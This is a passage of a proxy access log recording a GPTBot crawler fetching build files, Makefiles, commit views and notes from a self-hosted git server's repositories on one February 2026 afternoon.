74.7.227.38] [Length 31150] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10662] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fBatchControl.png" [Client 74.7.227.38] [Length 18721] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" -[17/Feb/2026:14:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10167] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10172] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10136] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10169] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10167] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 10911] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:14:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml" [Client 74.7.227.38] [Length 106390] [Gzip 10.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:14:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 130631] [Gzip 16.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:14:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" -[17/Feb/2026:14:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" -[17/Feb/2026:14:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11739] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 10929] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 24359] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:14:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" -[17/Feb/2026:14:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10291] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202127] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:14:52:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" -[17/Feb/2026:14:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/.vscode" -[17/Feb/2026:14:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f.patch" [Client 74.7.227.38] [Length 1473] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:14:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16086] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:14:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 18089] [Gzip 14.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:14:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:14:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11004] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:14:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 14174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:14:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:14:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" -[17/Feb/2026:14:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" [Client 74.7.227.38] [Length 10099] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:14:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:14:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/" -[17/Feb/2026:14:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10067] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" 